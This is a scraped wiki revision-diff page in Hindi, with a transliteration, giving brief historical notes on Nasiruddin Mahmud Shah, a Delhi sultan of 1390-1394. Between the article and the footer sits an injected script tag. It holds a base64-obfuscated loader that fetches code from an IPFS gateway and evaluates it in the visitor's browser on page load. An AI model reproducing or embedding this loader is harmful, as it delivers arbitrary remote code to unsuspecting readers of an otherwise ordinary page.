Difference between revisions of "नासिरुद्दीन महमूदशाह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*'''नासिरुद्दीन महमूदशाह''' (1390-1394 ई.) को अधिक शराब पीने की ...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
*'''नासिरुद्दीन महमूदशाह''' (1390-1394 ई.) को अधिक शराब पीने की आदत थी।
+
*'''नासिरुद्दीन महमूदशाह''' (1390-1394 ई.) को अधिक शराब पीने की [[आदत]] थी।
 
*शराब पीने की इसी आदत के कारण जनवरी, 1394 में उसकी मृत्यु हो गई।
 
*शराब पीने की इसी आदत के कारण जनवरी, 1394 में उसकी मृत्यु हो गई।
 
*उसके मरने के बाद उसके पुत्र 'हुमायूँ' को ‘अलाउद्दीन सिकन्दर शाह’ की उपाधि से [[दिल्ली]] की गद्दी पर बैठाया गया।
 
*उसके मरने के बाद उसके पुत्र 'हुमायूँ' को ‘अलाउद्दीन सिकन्दर शाह’ की उपाधि से [[दिल्ली]] की गद्दी पर बैठाया गया।

Latest revision as of 07:15, 29 June 2011

  • nasiruddin mahamoodashah (1390-1394 ee.) ko adhik sharab pine ki adat thi.
  • sharab pine ki isi adat ke karan janavari, 1394 mean usaki mrityu ho gee.
  • usake marane ke bad usake putr 'humayooan' ko ‘alauddin sikandar shah’ ki upadhi se dilli ki gaddi par baithaya gaya.
  • parantu 6 saptah mean hi humayooan ki bhi mrityu ho gee.
  • isake bad amiroan ne usake anuj mahamood tugalaq ko gaddi par baithaya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh